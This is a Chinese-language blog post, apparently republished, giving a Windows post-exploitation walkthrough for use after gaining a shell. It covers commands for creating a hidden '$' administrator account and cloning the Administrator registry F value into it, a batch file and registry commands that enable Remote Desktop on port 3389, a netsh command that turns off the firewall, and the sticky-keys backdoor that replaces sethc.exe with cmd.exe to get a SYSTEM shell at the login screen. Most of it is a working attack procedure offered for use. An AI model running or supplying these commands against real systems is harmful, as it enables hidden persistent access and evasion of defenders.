2023面试高手

这个屌丝很懒，什么也没留下！

热门标签

Windows影子用户及其相应的漏洞后渗透

作者：2023面试高手 | 2024-04-25 06:39:54

踩

影子用户

#当获得一条shell后，可以创建一个影子用户，通过影子用户可以行驶正常用户的所有权限与功能，

并且只可在注册表中被检测出来---(应急响应注册表很重要）

1.首先需要拥有权限创建一个Administrator用户，并分配管理员权限。


net user haha$ 123 /add     #创建一个新用户haha 密码是123
net localgroup administrators haha$ /add    #将该新用户移动到管理员组下
net localgroup users haha$ /del             #删除这个用户的记录

2.切换到影子用户下，然后打开注册表HKEY_LOCAL_MACHINE\SAM\SAM,右击权限，找到

Administrators勾选完全控制，关闭注册表。

3.在注册表HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names找到要创建

到账户，与其默认类型。（如果找不到domains，可以百度解决）

可以看到这个隐藏用户的默认类型是0x3f1

4.将隐藏用户导出注册表1.reg，放入桌面

5.将隐藏用户默认类型对应的注册表导出为2.reg到桌面上

6.接着导出想要复制的账户的默认类型，比如管理员帐户的默认类型为00001F4导出为3.reg

最终得到3个文件

7.然后打开2.reg，将3.reg中的F值对应替换为2.reg中的值，保存2.reg，删除3.reg.

8.在CMD窗口下，先在管理员权限下运行，删除用户haha$

net user haha$ /del

再次打开注册表发现之前注册表隐藏信息已经清楚，然后把1.reg,2.reg导入注册表

此时被修改后的注册表信息再次导入到注册表

此时影子用户已经完成。可以通过打开3389端口来远程连接，用影子用户的账号密码进行登陆。

查看端口开放情况：

cmd→netstat -ano

开放3389端口的方法1：


echo Windows Registry Editor Version 5.00>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg
echo "fDenyTSConnections"=dword:00000000>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg
echo "PortNumber"=dword:00000d3d>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg
echo "PortNumber"=dword:00000d3d>>3389.reg
regedit /s 3389.reg
del 3389.reg

将以上内容拷贝到文本文档内，将后缀名改为.bat格式，双击运行，即可开启3389端口。

开启端口方法2：

在cmd内，执行如下命令，即可开启3389端口。

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

在cmd内，执行如下命令，即可关闭3389端口。

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /f

开放完3389端口后，需要先明确被连接的主机的ip地址。可以通过cmd→ipconfig查看ipv4的内网地址，后连接即可。

连接后发现，可以通过原先创建的影子用户来访问该计算机，且获得了最高权限。账户 haha$ 密码123（看个人的设置）

3389连接windows的实践：

1.在目标系统开放3389端口

2.查看ip地址

3.进行远程桌面连接即可连接成功

PS：针对最新的windows操作系统需要注意 win10的安全策略很多，需要多重开放连接才行。受限制于系统版本有时候系统本身也不支持远程连接

通常支持的系统只需要开放3389端口以及相关服务同时支持远程连接即可成功连接！

连接条件：

1.计算机本身支持远程桌面同时这个要允许远程桌面

2.win+R -> services.msc -> 桌面服务 remote desktop services 把相关的RPG服务打开（cmd下的注册表命令同理）

3.知道目标的ip地址

新建用户提权到管理员关闭防火墙


net user zj 123 /add
net localgroup administrators zj /add
net user zj 123 /del
netsh advfirewall set allprofiles state off

（大招）shift漏洞（后门） 直接在登录界面按五下shift键即可召唤出system权限的cmd

把代码放到bat文件中传上去以后执行就行


takeown /f c:\windows\system32\sethc.* /a /r /d y
cacls c:\windows\system32\sethc.exe /T /E /G system:F
cacls c:\windows\system32\sethc.exe /T /E /G administrator:F
copy c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe /y

远程服务(3389)启动（3条命令打下去绝对成功）

win+r = mstsc

扫描的时候：13389

C:\Windows\System32\wbem\wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f

net start TermService

如果是特殊端口目标ip:13389 xxxx:13389

声明：本文内容由网友自发贡献，不代表【wpsshop博客】立场，版权归原作者所有，本站不承担相应法律责任。如您发现有侵权的内容，请联系我们。转载请注明出处：https://www.wpsshop.cn/w/2023面试高手/article/detail/483797